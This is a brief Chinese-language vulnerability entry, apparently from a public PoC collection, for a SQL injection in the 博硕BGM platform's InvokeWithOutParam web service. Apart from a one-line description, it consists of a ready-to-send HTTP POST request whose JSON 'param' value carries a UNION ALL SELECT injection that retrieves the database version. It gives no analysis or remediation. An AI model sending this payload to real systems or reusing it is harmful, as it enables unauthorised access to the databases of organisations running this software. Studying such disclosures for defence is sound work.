博硕BGM InvokeWithOutParam SQL注入漏洞

日期: 2025-10-29 | 影响软件: 博硕BGM | POC: 已公开

漏洞描述

博硕BGM InvokeWithOutParam SQL注入漏洞

PoC代码

POST /Service/RESTFulWebService/RESTFulServiceForWeb.asmx/InvokeWithOutParam HTTP/1.1
Host: 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Appstatecount: 1
Connection: keep-alive
Content-Length: 257
Content-Type: application/json
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
X-Requested-With: XMLHttpRequest

{
  "assembly": "Crystal.PlatForm.Basic",
  "className": "Crystal.PlatForm.Basic.clsDictionary",
  "method": "GetDicCommonItem",
  "isCacheInvoke": true,
  "param": ["1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL-- VJMn"]
}